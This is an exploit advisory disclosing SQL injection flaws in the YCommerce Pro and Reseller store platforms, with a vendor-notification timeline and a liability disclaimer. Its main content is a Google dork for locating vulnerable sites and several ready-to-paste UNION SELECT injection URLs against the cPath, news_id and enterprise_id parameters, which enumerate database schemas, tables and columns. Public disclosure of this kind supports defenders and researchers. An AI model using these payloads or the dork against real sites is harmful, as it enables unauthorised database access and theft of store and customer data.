# Exploit Title: YCommerce Pro/Reseller SQL Injection Vulnerability
# Google Dork: intext:desenvolvido por partteam.com - Plataforma YCommerce
# Date: 2012-09-21
# Exploit Author: Ricardo Almeida ricardojba@aeiou.pt
# Vendor Homepage: http://www.partteam.com
# Software Link: N/A
# Version: YCommerce Pro and YCommerce Reseller
# Tested on: N/A
# CVE: N/A


-- Affected Vendors:
---------------------
Partteam [M.S.N.F Soluções Informáticas, Lda.]


-- Affected Products:
---------------------
YCommerce [Reseller and Pro versions]



-- Disclosure Timeline:
-----------------------
2012-08-20 - Vendor Notification.
2012-08-30 - New Vendor Notification.
2012-09-20 - No Vendor Response / Feedback till date.
2012-09-21 - Public Disclosure.


Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--


Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61

GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--


-- Disclaimer:
--------------
The information provided in this advisory is provided as it is without any warranty.
I am not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
I do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.